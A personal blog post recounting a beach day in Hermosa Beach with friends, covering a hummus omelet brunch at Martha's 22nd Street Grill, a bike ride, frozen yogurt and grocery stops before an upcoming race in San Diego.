Today I met up with some good friends at Hermosa Beach. I am such a beach lover, I mean who isn’t right?! They are blessed with a good friend who lives right on the beach. Check out their view, lucky dogs!!

We got all geared up then headed out for Brunch (well lunch in my case).

They took me to one of their favorite spots to eat in Hermosa called Martha’s 22nd Street Grill. This place is a must if you are ever in the area.

I was told by Candice to order the Hummus Omelet.

I AM SO GLAD I DID! It was filled with egg whites, veggies, goat cheese, and sun dried tomatoes. Plus topped with a very tasty hummus. I LOVED IT!

After I enjoyed every last bite of lunch we headed out for a bike ride on the beach.

I have to say a 20 mile bike ride is a lot more fun then a 20 mile run 😉

Once we finished we got on our bathing suits and laid on the beach for a couple hours. Candice shared these delicious Tuna Creations for us to snack on 🙂 The sun felt great!

When we got back from laying out we got dressed and headed home. But before we took off we HAD to stop by Whole Foods!! I so wish we had one closer to us!!!

I said goodbye to the Watson’s and headed on home. As I was driving home I saw a PinkBerry!!! I am in LOVE with this place right now 🙂 Of course I just had to stop.

When I got back on the road I hit MAD traffic! BOO ON TRAFFIC!!! At least I had my Fro-Yo and Pandora 🙂

On the way home I picked a few more things and Fresh and Easy. Fridge is full.

Such a fun day filled with,friends,food,bikes, and Fro-Yo:) The only thing missing was Hubby (sadly he had to work).

I can’t believe I am starting my week on a Wednesday! The best part is I leave for SanDiego this weekend 🙂 Only three more days until the big RACE!
